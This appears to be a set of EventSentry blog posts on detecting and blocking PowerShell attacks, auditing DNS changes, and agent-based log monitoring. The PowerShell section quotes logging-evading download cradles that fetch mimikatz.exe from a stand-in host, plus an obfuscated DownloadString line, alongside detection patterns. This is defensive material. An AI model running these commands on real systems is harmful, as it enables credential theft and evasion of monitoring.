From PowerShell to p@W3RH311 – Detecting and Preventing PowerShell Attacks

In part one I provided a high level overview of PowerShell and the potential risk it poses to networks. Of course we can only mitigate some PowerShell attacks if we have a trace, so going forward I am assuming that you followed part 1 of this series and enabled:

  • Module Logging
  • Script Block Logging
  • Security Process Tracking (4688/4689)

I am dividing this blog post into 3 distinct sections:

  1. Prevention
  2. Detection
  3. Mitigation

We start by attempting to prevent PowerShell attacks in the first place, decreasing the attack surface. Next we want to detect malicious PowerShell activity by monitoring a variety of events produced by PowerShell and Windows (with EventSentry). Finally, we will mitigate and stop attacks in their tracks. EventSentry’s architecture involving agents that monitor logs in real time makes the last part possible.

But before we dive in … the

PowerShell Downgrade Attack

In the previous blog post I explained that PowerShell v2 should be avoided as much as possible since it offers zero logging, and that PowerShell v5.x or higher should ideally be deployed since it provides much better logging. As such, you would probably assume that basic script activity would end up in one of the PowerShell event logs if you enabled Module & ScriptBlock logging and have at least PS v4 installed. Well, about that.

So let’s say a particular Windows host looks like this:

  • PowerShell v5.1 installed
  • Module Logging enabled
  • ScriptBlock Logging enabled

Perfect? Possibly, but not necessarily. There is one version of PowerShell that, unfortunately for us, doesn’t log anything useful whatsoever: PowerShell v2. Also unfortunately for us, PowerShell v2 is installed on pretty much every Windows host out there, although only activated (usable) on those hosts where it either shipped with Windows or where the required .NET Framework is installed. Unfortunately for us #3, forcing PowerShell to use version 2 is as easy as adding -version 2 to the command line. So for example, the following line will download some payload and save it as calc.exe without leaving a trace in any of the PowerShell event logs:

powershell -version 2 -nop -NoLogo -Command "(new-object System.Net.WebClient).DownloadFile('http://www.pawnedserver.net/mimikatz.exe', 'calc.exe')"

However, let's not forget that PowerShell accepts abbreviated command line parameters as long as they don't conflict with other parameters, so running

powershell -v 2 -nop -NoLogo -Command "(new-object System.Net.WebClient).DownloadFile('http://www.pawnedserver.net/mimikatz.exe', 'calc.exe')"

does the exact same thing. So when doing pattern matching we need to use something like -v* 2 to ensure we can catch this parameter.
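As a minimal sketch of what such a pattern could look like in practice – assuming $cmdline holds a captured command line (a hypothetical variable for illustration) – the following PowerShell snippet matches every unambiguous abbreviation of -version:

# Sketch: match any abbreviation of "-version 2" (-v 2, -ver 2, -version 2.0, ...)
$pattern = '(?i)-v(?:e(?:r(?:s(?:i(?:o(?:n)?)?)?)?)?)?\s+2(?:\.0)?\b'
$cmdline = 'powershell -v 2 -nop -NoLogo -Command "..."'   # hypothetical captured command line
if ($cmdline -match $pattern) { Write-Warning 'Possible PowerShell downgrade attempt' }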

Microsoft seems to have recognized that PowerShell is being exploited for malicious purposes, resulting in some of the advanced logging options like ScriptBlockLogging being supported in newer versions of PowerShell / Windows. At the same time, Microsoft also pats itself on the back by stating that PowerShell is – by far – the most securable and security-transparent shell, scripting language, or programming language available. This isn't necessarily untrue – any scripting language (Perl, Python, …) can be exploited by an attacker just the same and would leave no trace whatsoever. And most interpreters don't have the type of logging available that PowerShell does. The difference with PowerShell is simply that it's installed by default on every modern version of Windows. This is any attacker's dream – they have a complete toolkit at their fingertips.

So which Operating Systems are at risk?

PowerShell Version 2 Risk

Windows Version        PS v2 Active By Default   PS v2 Removable?   Threat Level
Windows 7              Yes                       No                 Vulnerable
Windows 2008 R2        Yes                       No                 Vulnerable
Windows 8 & later      No                        Yes                Potentially Vulnerable – depends on .NET Framework v2.0
Windows 2012 & later   No                        Yes                Potentially Vulnerable – depends on .NET Framework v2.0

Versions of Windows susceptible to Downgrade Attack

OK, so that's the bad news. The good news is that unless PowerShell v2 was installed by default, it isn't "activated" unless the .NET Framework 2.0 is installed – and on many systems that is not the case. The bad news is that .NET 2.0 will likely be installed on some systems, making this downgrade attack feasible. More good news is that we can detect & terminate PowerShell v2 instances with EventSentry (especially when 4688 events are enabled) – important because PowerShell v2 can't always be uninstalled (see table above). And since we're on a roll here – more bad news is that you can install the required .NET Framework with a single command:

dism.exe /online /enable-feature /featurename:NetFX3 /all

Of course one would need administrative privileges to run this command, something that makes this somewhat more difficult. But attacks that bypass UAC exist, so it’s feasible that an attacker accomplishes this if the victim is a local administrator.

According to a detailed (and very informative) report by Symantec, PS v2 downgrade attacks haven’t been observed in the wild (of course that doesn’t necessarily mean that they don’t exist), which I attribute to the fact that most organizations aren’t auditing PowerShell sufficiently, making this extra step for an attacker unnecessary. I do believe that we will start seeing this more, especially with targeted attacks, as organizations become more aware and take steps to secure and audit PowerShell.

1. Prevention

Well, I think you get the hint: PowerShell v2 is bad news, and you’ll want to do one or all of the following:

  • Uninstall PowerShell v2 whenever possible
  • Prevent PowerShell v2 from running (e.g. via AppLocker)
  • Detect and terminate any instances of PowerShell v2

If you so wish, then you can read more about the PowerShell downgrade attack and detailed information on how to configure AppLocker here.

Uninstall PowerShell v2

Even if the .NET Framework 2.0 isn't installed, there is usually no reason to have PowerShell v2 installed. I say usually because some Microsoft products like Exchange Server 2010 do require it and force all scripts to run against version 2. PowerShell version 2 can be uninstalled manually (Windows 8 & higher, Windows Server 2012 & higher) from the Control Panel's Programs & Features applet, or with a single PowerShell command (why of course – we're using PowerShell to remove PowerShell!):

Disable-WindowsOptionalFeature -Online -FeatureName 'MicrosoftWindowsPowerShellV2' -NoRestart

While running this command is slightly better than clicking around in Windows, it doesn't help much when you want to remove PowerShell v2.0 from dozens or even hundreds of hosts. Since PowerShell can run commands remotely as well (something in my gut already tells me this won't always be used for honorable purposes), we can use the Invoke-Command cmdlet to run this statement on a remote host:

Invoke-Command -ComputerName WKS1 -ScriptBlock { Disable-WindowsOptionalFeature -Online -FeatureName 'MicrosoftWindowsPowerShellV2' -NoRestart }

Just replace WKS1 with the host name from which you want to remove PowerShell v2 and you’re good to go. You can even specify multiple host names separated by a comma if you want to run this command simultaneously against multiple hosts, for example

Invoke-Command -ComputerName WKS1,WKS2,WKS3 -ScriptBlock { Disable-WindowsOptionalFeature -Online -FeatureName 'MicrosoftWindowsPowerShellV2' -NoRestart }
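If you maintain a list of hosts in a text file, a small sketch like the following can take care of an entire batch (hosts.txt is a hypothetical file with one host name per line):

# Sketch: disable the PS v2 engine on every host listed in hosts.txt
$hosts = Get-Content .\hosts.txt
Invoke-Command -ComputerName $hosts -ScriptBlock {
    Disable-WindowsOptionalFeature -Online -FeatureName 'MicrosoftWindowsPowerShellV2' -NoRestart
}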

Well congratulations, at this point you’ve hopefully accomplished the following:

  • Enabled ModuleLogging and ScriptBlockLogging enterprise-wide
  • Identified all hosts running PowerShell v2 (you can use EventSentry’s inventory feature to see which PowerShell versions are running on which hosts in a few seconds)
  • Uninstalled PowerShell v2 from all hosts where supported and where it doesn't break critical software (a quick way to verify is sketched below)
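As a manual spot check – assuming the host supports the optional-feature cmdlets, i.e. Windows 8 / Server 2012 or later – something along these lines verifies that the v2 engine is really gone:

# Sketch: query the state of the PS v2 engine on a remote host
Invoke-Command -ComputerName WKS1 -ScriptBlock {
    Get-WindowsOptionalFeature -Online -FeatureName 'MicrosoftWindowsPowerShellV2' |
        Select-Object FeatureName, State
}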

Terminate PowerShell v2

Surgical Termination using 4688 events

If you cannot uninstall PowerShell v2.0, don't have access to AppLocker, or want an easier alternative, you can also use EventSentry to terminate any powershell.exe process that invokes PowerShell v2.0 with the -version 2 command line argument. We do this by creating a filter that looks for 4688 powershell.exe events which include the -version 2 argument, and then link that filter to an action that terminates that PID.

Filter & Action to terminate PS v2.0
Filter & Action to terminate PS v2.0

If an attacker tries to launch his malicious PowerShell payload using the PS v2.0 engine, then EventSentry will almost immediately terminate that powershell.exe process. There will be a small lag between the time the 4688 event is logged and when EventSentry sees & analyzes the event, so it's theoretically possible that part of a script will begin executing. In all of the tests I have performed however, even a simple "Write-Host Test" PowerShell command wasn't able to execute properly because the powershell.exe process was terminated before it could run. This is likely because the PowerShell engine does need a few milliseconds to initialize (after the 4688 event is logged), enough time for EventSentry to terminate the process. As such, any malicious script that downloads content from the Internet will almost certainly be terminated before it can do any harm.
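For readers without EventSentry, the following one-shot sketch approximates the idea – note that it's a polling sweep, not a real-time filter, so it offers none of the timing guarantees described above:

# Sketch: find and kill powershell.exe processes started with a "-version 2" style argument
Get-CimInstance Win32_Process -Filter "Name='powershell.exe'" |
    Where-Object { $_.CommandLine -match '(?i)-v(?:ersion)?\s+2\b' } |
    ForEach-Object { Stop-Process -Id $_.ProcessId -Force }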

Shotgun Approach

The above approach won't prevent all instances of PowerShell v2.0 from running however, for example when the PowerShell v2.0 prompt is invoked through a shortcut. In order to prevent those instances of PowerShell from running we'll need to watch out for Windows PowerShell event id 400, which is logged anytime PowerShell is launched. This event tells us which version of PowerShell was just launched via the EngineVersion field, e.g. it will include EngineVersion=2.0 when PowerShell v2.0 is launched. We can look for this text and link it to a Service action (which can also be used to terminate processes).

Filter & Action to terminate all powershell instances
Terminate all powershell instances

Note: Since there is no way to correlate a Windows PowerShell event 400 with an active process (the 400 event doesn't include a PID), we cannot selectively kill only version 2 powershell.exe processes. As such, when a PowerShell v2 instance is detected, all powershell.exe processes are terminated – including version 5 instances. I personally don't expect this to be a problem, since PowerShell processes usually only run for short periods of time, making it unlikely that a PowerShell v5 process is active while a PowerShell v2.0 process is (maliciously) being launched. But decide for yourself whether this is a practicable approach in your environment.
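Outside of EventSentry you can spot these engine starts with a quick query against the Windows PowerShell log, for example:

# Sketch: list PowerShell engine starts (event 400) that report EngineVersion=2.0
Get-WinEvent -FilterHashtable @{ LogName = 'Windows PowerShell'; Id = 400 } |
    Where-Object { $_.Message -match 'EngineVersion=2\.0' } |
    Select-Object TimeCreated, Id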

2. Detection

Command Line Parameters

Moving on to detection, our objective is to identify potentially malicious uses of PowerShell. Due to the wide variety of abuse possibilities with PowerShell it's somewhat difficult to detect every suspicious invocation of PowerShell, but there are a number of command line parameters that should almost always raise a red flag. In fact, I would recommend alerting on or even terminating all powershell instances which include the following command line parameters:

Highly Suspicious PowerShell Parameters

Parameter                 Variations                              Purpose
-noprofile                -nop                                    Skips loading profile.ps1, thus avoiding logging
-encoded                  -e                                      Lets a user run encoded PowerShell code
-ExecutionPolicy bypass   -ep bypass, -exp bypass, -exec bypass   Bypasses any execution policy in place, may generate false positives
-windowStyle hidden       –                                       Prevents the creation of a window, may generate false positives
-version 2                -v 2, -version 2.0                      Forces PowerShell version 2

Any invocation of PowerShell that includes the above parameters is highly suspicious

The advantage of analyzing command line parameters is that it doesn't rely on PowerShell logging, since we can evaluate the command line field of 4688 security events. EventSentry v3.4.1.34 and later can retrieve the command line of a process even when it's not included in the 4688 event (if the process is active long enough). There is a risk of false positives with these parameters, especially the "windowStyle" option that is used by some Microsoft management scripts.
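As an illustration of the same idea outside of EventSentry, here is a rough sketch that sweeps existing 4688 events for the parameters from the table above – the pattern is purely illustrative and will need tuning and exclusions for your environment:

# Sketch: hunt for process creations whose command line contains suspicious PowerShell switches
$suspicious = '(?i)-nop\b|-e(?:nc(?:oded)?)?\b|-e(?:p|xp|xec)\s+bypass|-w(?:indowstyle)?\s+hidden|-v(?:ersion)?\s+2\b'
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } |
    Where-Object { $_.Message -match 'powershell' -and $_.Message -match $suspicious } |
    Select-Object TimeCreated, Id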

Modules

In addition to evaluating command line parameters we'll also want to look out for modules that are predominantly used in attacks, such as .Download, .DownloadFile, Net.WebClient or DownloadString. This is a much longer list and will need to be updated on a regular basis as new toolkits and PowerShell functions become available.

Depending on the attack variant, module names can be monitored via security event 4688 or through PowerShell's enhanced module logging (hence the importance of suppressing PowerShell v2.0!), e.g. event 4103. Again, you will most likely get some false positives and have to set up a handful of exclusions.

Command / Code Obfuscation

But looking at the command line and module names still isn't enough, since it's possible to obfuscate PowerShell commands using the backtick character. For example, the command

(New-Object Net.WebClient).DownloadString('https://bit.ly/L3g1t')

could easily be detected by looking for a *Net.WebClient*, *DownloadString* or *https* pattern. Curiously enough, this command can also be written in the following way:

Invoke-Expression (New-Object Net.Web`C`l`i`ent)."`D`o`wnloadString"('h'+'t'+'t'+'ps://bit.ly/L3g1t')

This means that just looking for DownloadString or Net.WebClient is not sufficient; Daniel Bohannon devoted an entire presentation to PowerShell obfuscation that's available here. Thankfully we can still detect tricks like this with regex patterns that look for a high number of single quotes and/or back tick characters. An example RegEx expression for EventSentry that detects 2 or more back ticks looks like this:

^.*CommandLine=.*([^`]*`){2,}[^`]*.*$

The above expression can be used on PowerShell Event ID 800 events, and will trigger every time a command which involves 2 or more back ticks is executed. To customize the trigger count, simply change the number 2 to something lower or higher. And of course you can look for characters other than the back tick as well – just substitute them in the above RegEx. Note that the character we look for appears three (3) times in the RegEx, so it will have to be substituted 3 times.
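A quick way to sanity-check the core of the pattern, assuming a PowerShell prompt is handy:

# The obfuscated sample from above contains more than 2 back ticks, so this returns True
'(New-Object Net.Web`C`l`i`ent)' -match '([^`]*`){2,}'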

To make things easier for EventSentry users, EventSentry now offers a PowerShell event log package which you can download via the Packages -> Download feature. The package contains filters which will detect suspicious command line parameters (e.g. “-nop”), detect an excessive use of characters used for obfuscation (and likely not used in regular scripts) and also find the most common function names from public attack toolkits.

Evasion

It's still possible to avoid detection rules that focus on powershell.exe if the attacker manages to execute PowerShell code through a binary other than powershell.exe, because powershell.exe is essentially just the "default vehicle" that facilitates the execution of PowerShell code. The NPS (NotPowerShell) project is a good example and executes PS code through a binary named nps.exe (or whatever the attacker wants to call it), but there are others. While the thought of running PowerShell code through any binary seems a bit concerning from a defender's perspective, it's important to point out that downloading another binary negates the advantage of PowerShell being installed by default. I would only expect to see this technique in sophisticated, targeted attacks that possibly start out utilizing the built-in PowerShell, but then download a stealth app for all subsequent activity.

This attack can still be detected if we can determine that one of the following key DLLs from the Windows management framework are being loaded by a process other than powershell.exe:

  1. System.Management.Automation.dll
  2. System.Management.Automation.ni.dll
  3. System.Reflection.dll

You can detect this with Sysmon, something I will cover in a follow-up article.
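Until then, here is a rough interim check – a point-in-time snapshot only, which will miss short-lived processes, and access to some processes will be denied:

# Sketch: list non-powershell processes that have the PowerShell automation DLL loaded
Get-Process | ForEach-Object {
    try {
        if ($_.Name -notmatch 'powershell' -and
            ($_.Modules.ModuleName -match 'System\.Management\.Automation')) {
            $_ | Select-Object Name, Id
        }
    } catch { }  # module lists of protected/system processes can't be read; skip them
}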

3. Mitigation

EventSentry PowerShell Rules
EventSentry PowerShell Rules

Now, having traces of all PowerShell activity when doing forensic investigations is all well and good, and detecting malicious PowerShell activity after it happened is a step in the right direction. But if we can ascertain which commands are malicious, then why not stop & prevent the attack before it spreads and causes damage?

In addition to the obvious action of sending all logs to a central location, there are a few things we can do in response to potentially harmful activity:

1. Send out an alert
2. Mark the event to require acknowledgment
3. Attempt to kill the process outright (the nuclear option)
4. A combination of the above

If the only source of the alert is one of the PowerShell event logs then killing the exact offending PowerShell process is not possible, and all running powershell.exe processes have to be terminated. If we can identify the malicious command from a 4688 event however, then we can perform a surgical strike and terminate only the offending powershell.exe process – other (presumably benign) powershell.exe processes will remain unharmed and can continue to do whatever they were supposed to do.

If you're unsure as to how many PowerShell scripts are running on your network (and not knowing this is not embarrassing – many Microsoft products run PowerShell scripts on a regular basis in the background) then I recommend just sending email alerts initially (say, for a week) and observing the generated alerts. If you don't get any alerts, or no legitimate PowerShell processes are identified, then it should be safe to link the filters to a "Terminate PowerShell" action as shown in the screenshots above.

Testing

After downloading and deploying the PowerShell package I recommend executing a couple of offending PowerShell commands to ensure that EventSentry will detect them and either send out an alert or terminate the process (or both – depending on your level of conviction). The following commands should be alerted on and/or blocked:

powershell.exe -nop Write-Host AlertMe

powershell.exe (New-Object Net.WebClient).DownloadString('https://bit.ly/L3g1t')

powershell.exe `Wr`it`e-`H`ost AlertMeAgain

False Alerts & Noise

Any detection rules you set up, whether with EventSentry or another product, will almost certainly result in false alerts – the amount of which will depend on your environment. Don't let this dissuade you – simply identify the hosts which are "incompatible" with the detection rules and exclude either specific commands or exclude hosts from these specific rules. It's better to monitor 98 out of 100 hosts than not monitor any host at all.

With EventSentry you have some flexibility when it comes to excluding rules from one or more hosts.

Conclusion

PowerShell is a popular attack vector on Windows-based systems since it’s installed by default on all recent versions of Windows. Windows admins need to be aware of this threat and take the appropriate steps to detect and mitigate potential attacks:

  1. Disable or remove legacy versions of PowerShell (=PowerShell v2)
  2. Enable auditing for both PowerShell and Process Creation
  3. Collect logs as well as detect (and ideally prevent) suspicious activity

EventSentry users have an excellent vantage point since its agent-based architecture can not only detect malicious activity in real time, but also prevent it. The PowerShell Security event log package, which can be downloaded from the management console, offers a list of rules that can detect many PowerShell-based attacks.

Auditing DNS Server Changes on Windows 2008/2008R2/2012 with EventSentry

In part one of this blog series we showed how to monitor DNS audit logs in Windows 2012 R2 and higher with EventSentry.

Before I continue I need to point out that DNS auditing has become significantly easier starting with Windows 2012 R2. Not only is it enabled by default, but the generated audit data is also much more granular and easier to interpret. The logged events even distinguish between regular and dynamic updates, making it easy to filter out noise. So if you’re serious about DNS auditing and have the option to update then I recommend you do so.

If you’re running Windows 2008 (R2) or 2012 then setting up DNS auditing requires a few steps. Thankfully it’s a one-time process and shouldn’t take more than a few minutes. On the EventSentry side a pre-built package with all the necessary rules is available for download and included with the latest installer.

Please follow the steps outlined below exactly as described – auditing won't work, or will be incomplete, if any of them are skipped.

Enabling Directory Service Auditing

Enabling Sub Category Auditing

We first need to make sure that the new subcategory-based audit settings are enabled in group policy. If you've already done that, then you can skip this step and jump to "ADSI Edit".

Since most of the steps here involve domain controllers, I recommend that you make the changes in a group policy, e.g. in the "Default Domain Controller" policy. In Group Policy Management, find an existing group policy, or create a new one, and set Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\Security Options\Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings to Enabled.

Then, navigate to Computer Configuration\Policies\Windows Settings\Advanced Audit Policy Configuration\Audit Policies\DS Access and set Audit Directory Service Changes to Success.
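Once group policy has refreshed you can verify the effective setting on a domain controller from an elevated prompt:

auditpol /get /subcategory:"Directory Service Changes"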

ADSI Edit

Open ADSI Edit via Start -> Run -> “adsiedit.msc”. If your default naming context does not automatically appear OR if the listed naming context does not include dc=domaindnszones, then select “Action -> Connect To” and connect to the appropriate naming context, e.g.

dc=domaindnszones,dc=yourdomain,dc=com

Replace the dc components after “domaindnszones” with the actual DNS name of your domain. It’s important that “dc=domaindnszones” is part of the naming context.

Once connected, expand the naming context and locate the “CN=MicrosoftDNS” container, right-click it, and select Properties. Then select Security, Advanced, Auditing and click on Add. In the resulting dialog we’ll audit the built-in “Everyone” user so that DNS changes from everyone are audited:

Name (Principal): Everyone
Apply onto:       This object and all descendent objects
Access:           Create dnsZone objects

 

Enabling auditing with ADSI Edit (1)

It may seem tempting to also check the “Delete dnsZone objects”, but resist the temptation. Don’t be fooled by the term “dnsZone”, the ACE entry we just added will audit the creation of all AD DNS objects (and not just DNS zones) and log event 5136 to the security event log. In order to audit deletions as well, click “Add” again but this time configure the dialog as shown below:

Name (Principal): Everyone
Apply onto:       Descendent dnsZone objects
Access:           Delete
Enabling auditing with ADSI Edit (2)

It's important that the "Apply onto" is changed to Descendent dnsZone objects. This ACE entry will result in event 5141 being logged when a DNS-related directory service object is deleted. This is where things get a bit interesting though, since DNS records deleted from the DNS manager aren't actually deleted. Instead, they are tombstoned (which is done internally by adding the dNSTombstoned attribute to the object). Only when the tombstoned object expires is it actually deleted. You can use ADSIEdit if you want to send a DNS object immediately to heaven and skip the graveyard stage.
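If you're curious which DNS objects are currently in that tombstoned state, a sketch like the following works on hosts with the ActiveDirectory module (adjust the dc components of the search base for your domain):

# Sketch: list tombstoned DNS objects awaiting final deletion
Get-ADObject -SearchBase 'DC=DomainDnsZones,DC=yourdomain,DC=com' `
    -LDAPFilter '(dNSTombstoned=TRUE)' -Properties whenChanged |
    Select-Object Name, whenChanged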

Unlike Windows 2012 R2 and later, earlier versions of Windows are a little more verbose than you'd probably like when it comes to directory service auditing. For example, creating a new DNS A record in a zone will result in 4 different events with id 5136 being logged – and not just one. The events logged when adding or deleting a zone or A record are shown in the diagram below:

Directory Service Changes events

All events are logged under the “Directory Service Changes” category.

Testing

Before we start configuring EventSentry, we'll want to make sure that auditing was set up correctly. On a domain controller, open the "DNS" application and temporarily add either a new A record or a primary zone. You should see either a 5136 or a 5137 event with the category "Directory Service Changes" logged to the security event log.
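Instead of scrolling through the security event log you can also check from PowerShell:

# Sketch: show the 10 most recent directory service change events (5136 = modified, 5137 = created)
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 5136, 5137 } -MaxEvents 10 |
    Select-Object TimeCreated, Id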

If you don’t see the events then walk through the above steps again, or reference this Microsoft article.

Configuring EventSentry

There are generally two things one will want to do with these audit events – store them in a database and/or email them. If you're already consolidating Audit Success events in an EventSentry database then you shouldn't have to do anything, all directory service change events will be written to the database automagically.

Database

If you only want to store directory service change events in the database (opposed to storing all audit success events), then you can simply create an include filter with the following properties:

Log:      Security
Severity: Audit Success
Source:   Microsoft-Windows-Security-Auditing
Category: Directory Service Changes

… and assign your database action to it.

Alerts

Setting up alerts using filters for when zones or records are added or removed is a little more involved than one would hope, thanks to Windows logging more than one event whenever such a change is made – as depicted in the image above. For example, creating a new DNS record will result in 4 x 5136 events being logged, while deleting one will result in 3 events.

Lucky for you, we've analyzed the events and created a DNS Server Auditing package in EventSentry which will email you a single alert (=event) whenever a record or zone is added or removed. This package is included with all new installations of EventSentry; existing users running 3.4 or later can get it through the package update feature in the management console.

DNS Server Auditing Package
DNS Server Auditing Package

And that’s really all there is to it … if you have EventSentry installed then setting up auditing in Windows is really the only obstacle to auditing your DNS records!

Agent vs Agentless: Why you should monitor (event) logs with an agent-based log monitoring solution

The debate as to whether agent-based or agent-less monitoring is “better” has been answered many times over the years in magazine / online articles, blog posts, vendor white papers and others. Unfortunately, most of these articles are often incomplete, inaccurate, biased, or a combination thereof.

To make things slightly more confusing, different ISVs use different methods for monitoring servers and workstations. Some use agents, some don't, and a small few offer both methods. But what is ultimately the best method?

What are you monitoring?

First it's important to determine what is being monitored before deciding whether an agent-based or agent-less approach is better. For example, collecting system metrics like performance data usually creates fewer challenges than transmitting large amounts of (event) log data. Furthermore, agent-based monitoring is not an option for devices which run a proprietary embedded OS (think switch, printer, …) where you can't install an agent in the first place.

Consequently I’ll be focusing on monitoring (event) logs with an emphasis on Microsoft Windows in this post. Having developed both agent-based as well as agent-less components in C++ over the years I feel that I am in a good position to objectively compare agent-based with agent-less approaches.

The Myths

Monitoring software is of course not the only type of software that uses agents – a lot of other enterprise software (backup, deployment, A/V, …) uses agents as well. Below are some of the myths as to what (monitoring) using agents entails:

  • Agents may use up too many resources on the monitored hosts and slow down the monitored machines
  • Agents can become unstable and negatively affect the host OS
  • Deploying and managing agents is tedious and time-consuming
  • Installing agents may require the installation & deployment of dependencies the agents need (.NET, Java, …)
  • Installing third-party software will decrease the security of the monitored host

The Reality

It's understandable that software which is installed on potentially every server and workstation in a network undergoes some level of scrutiny, but would you be surprised to learn that agents excel in the following areas?

1. Security: Better security since agents push data to a central component, instead of the monitored server being configured to allow remote collection.
2. Reliability: Agents can temporarily store and cache monitored logs if connectivity to the central monitoring server is lost, even if local logs are no longer available. Agents can also take corrective actions more quickly because they can work in isolation (offline). Mobile devices cannot be monitored with agent-less solutions since they cannot be reached by the central monitoring component.
3. Performance: Agents can apply local filtering rules and only transmit data which is valuable, thus increasing throughput while decreasing network utilization.
4. Functionality: They offer more capabilities since there are essentially no limits as to what type of information can be gathered by an agent since it has full access to the monitored system.

The Easy Way Out

Developing agents along with an easy-to-use deployment mechanism requires a lot of time and resources, so it doesn't come as a surprise that many vendors prefer to monitor hosts without agents. To compensate for the shortfall, ISVs which rely solely on an agent-less approach will do their best to:

  • Emphasize that they do not use agents
  • Persuade you that agent-less monitoring is preferable

The irony, when promoting a solution as agent-less, is that even so-called agent-less solutions do in fact utilize an agent – the only difference being that the agent is (usually) integrated into Windows. Windows doesn't just magically service remote clients asking for a boatload of WMI data – it processes these requests through the WMI service, which, for all intents and purposes, is an agent. For example, accessing the Windows event logs via WMI traverses significantly more layers than accessing the event logs directly.
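To make this concrete, the following sketch shows what "agent-less" event log collection typically boils down to – a remote WMI/CIM query serviced by the WMI service on the monitored host (WKS1 is a placeholder, and the query requires appropriate remote privileges):

# Sketch: remotely pull Security event log records via WMI/CIM – the "agent-less" way
Get-CimInstance -ComputerName WKS1 -ClassName Win32_NTLogEvent `
    -Filter "Logfile='Security'" | Select-Object -First 10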

Conclusion

With the exception of network devices where an agent cannot be installed, agent-based solutions will provide a more thorough monitoring experience 9 out of 10 times – assuming that the agent meets all the checklist requirements below.

Some event log monitoring vendors will try to convince you that agent-less monitoring is better & easier (easier for whom?) – but don’t fall for it. We’ve been tweaking and improving the EventSentry agent for more than 10 years, and as a result EventSentry offers one of the most advanced and efficient Windows agents for log monitoring on the market. Developing a rock-solid, secure and fast agent is hard, but it’s the only sensible approach which doesn’t cut corners.

There are situations when deploying a full-scale monitoring solution with agents is not possible, for example when you are tasked with monitoring a third-party network where installing any software is not an option. While unfortunate, an agent-less monitoring solution can fill the gap in this case.

EventSentry also utilizes SNMP (agent-less) to gather inventory, performance metrics as well as other system data from non-Windows devices, including Linux hosts. This collection method does suffer from the above limitations, but since log data is pushed from Non-Windows devices via the Syslog protocol, it’s an acceptable compromise.

Don’t compromise when it comes to monitoring the (event) logs of your Windows infrastructure and select an architecture which scales and offers security & performance.

Technical Comparison

The table below examines the difference between agent-based and agent-less solutions in greater detail.

Resource Utilization & Performance

Agent-Based:
  • Usually higher throughput since agents can analyze, filter and evaluate log entries before sending them across the network.
  • Local resource utilization depends on the implementation of the agent.
  • Agents can access (event) logs directly via efficient API access.

Agent-Less:
  • Network utilization is likely much higher since more logs have to be transmitted across the network before being evaluated. Local filtering capabilities are limited and depend on the protocol (usually WMI).
  • Network latency and utilization affect the performance of the monitoring solution. Network utilization cannot be controlled.
  • Accessing (event) log data remotely through WMI is much less efficient.
  • Over-saturation of the central monitoring component can negatively affect monitoring of the entire infrastructure.

Verdict: Higher network utilization, combined with the fact that remote log collection still utilizes CPU cycles on the remote host (e.g. through the WMI provider), favors agent-based solutions. Agent-less solutions have a single point of failure, while agents can filter & evaluate data locally before transmitting it to a central database. EventSentry agents are designed to be essentially invisible under normal operations and do not impact the host system negatively in any way.
Stability & Reliability

Agent-Based:
  • Failure of an agent does not affect monitoring of other hosts.
  • Locally collected data can be cached if the central monitoring component is temporarily unavailable.
  • Failure of a central component may negatively affect deployed agents if they rely on the central component and cannot cache data.

Agent-Less:
  • Failure of the central monitoring system will affect and potentially disable monitoring of all hosts.
  • Hosts which lose network connectivity (e.g. laptops) cannot be monitored while unreachable.

Verdict: Agent-based solutions have an advantage since local data can be cached and corrective actions can be executed even when the central monitoring component is unavailable. Cached data & logs are re-transmitted – even if the local logs have been cleared or overwritten. Agent-based solutions can also monitor hosts while disconnected from the LAN. The EventSentry agent auto-recovers if the process aborts unexpectedly, and by default alerts the user when this occurs. When using the collector (default), the agent caches all data locally and retransmits it when the network connection becomes available again.
Deployment

Agent-Based:
  • Has to be deployed either with vendor management software and/or with third-party deployment software if the vendor provides an installation package (e.g. MSI).

Agent-Less:
  • Larger deployments will require multiple central monitoring components, potentially distributed over several LANs.
  • Only hosts in the local LAN can be monitored.

Verdict: Depends on the deployment tools made available by the vendor as well as the management tools in place for configuring Windows settings. A poorly developed deployment tool would favor an agent-less solution. EventSentry agents can be deployed (multi-threaded) with the management console or through 3rd-party deployment software by creating an MSI installer on the fly. When using the collector (default), agent updates (patches) can be deployed automatically.
Dependencies

Agent-Based:
  • The agent may have dependencies on third-party frameworks.

Agent-Less:
  • Depends on whether the mechanism utilized by the monitoring software requires a Windows component to be added and/or configured.

Verdict: Depends on whether the agent has dependencies and whether configuration changes need to be made on the monitored hosts. The EventSentry agent does not depend on any 3rd-party frameworks or libraries.
Security

Agent-Based:
  • Potential security issues if the installed agent exposes itself to the network (if not firewalled) and/or suffers from local vulnerabilities which can be exploited.

Agent-Less:
  • Remote log collection has to be enabled and at least the central monitoring component needs to have remote access.
  • Secure data transmission relies on protocols and settings from Windows.
  • Enabling multiple methods for gathering data remotely (e.g. WMI) provides additional attack vectors.
  • Credentials (usually Windows user/password) for remote systems must be stored in a central location so that the remote hosts can be queried. If the central system gets compromised, critical credentials can be exploited.

Verdict: Since agent-based solutions do not require permanent remote access, monitored hosts can be hardened more, making them inherently more secure IF the agent doesn't suffer from an insecure design and/or vulnerabilities. Agent-based solutions also have more control over how data is transmitted from the remote hosts. If there is a general concern about third-party software then the product in question should be researched in a vulnerability database like http://www.cvedetails.com. The EventSentry agent does not open any ports on a monitored host and resides in a secured location on disk. The agent transmits compressed data securely via TLS to the collector. No major security vulnerabilities have been discovered in the EventSentry agent since its first release in 2002.
Scope & Functionality

Agent-Based:
  • Agents have full access to the monitored system and can choose which technology to utilize to get the required data (API, WMI, registry, …).
  • Local corrective actions like launching a script or process are easy to execute.

Agent-Less:
  • Agent-less solutions are limited to the remote APIs provided by the monitored host, most commonly WMI. While WMI does offer a lot of functionality, there are limitations.
  • Executing scripts on the remote host is more involved and only possible while the host is reachable.

Verdict: Agent-based solutions have an advantage since they can utilize multiple technologies to obtain data, including highly efficient direct API access. Agents can also trigger (corrective) actions locally even while the host is unreachable. Agent-less solutions can only monitor data which is made available by the remote protocol. The EventSentry agent accesses log files, event logs and other system health data almost exclusively via direct API calls. The more resource-intensive WMI interface is only used minimally, for very specific purposes. Corrective action can be taken directly on the monitored host, often within milliseconds after an error condition (event) has occurred.

 

Appendix: Checklist

When evaluating software that offers agents, you can use the checklist below.

Resource Utilization
An agent needs to consume as little resources as possible under normal operations. With the exception of short (and unusual) peak periods, a user should never know that an agent is running on their server or workstation – period.
